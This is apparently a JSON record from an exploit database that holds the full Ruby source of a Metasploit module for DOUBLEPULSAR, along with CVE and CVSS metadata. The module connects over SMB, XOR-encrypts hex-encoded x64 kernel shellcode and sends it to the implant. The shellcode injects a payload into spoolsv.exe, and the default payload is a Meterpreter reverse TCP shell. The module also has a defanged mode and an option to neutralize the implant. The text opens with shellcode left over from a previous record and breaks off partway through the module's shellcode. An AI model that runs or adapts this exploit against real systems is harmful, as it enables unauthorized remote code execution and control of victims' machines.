\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-25] #"}, "lastseen": "2021-10-25T00:17:11", "differentElements": ["sourceData"], "edition": 55}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f841c957c58498d819128713153bbb6d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-26T08:21:53", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", 
"1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T08:21:53", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-26T08:21:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n 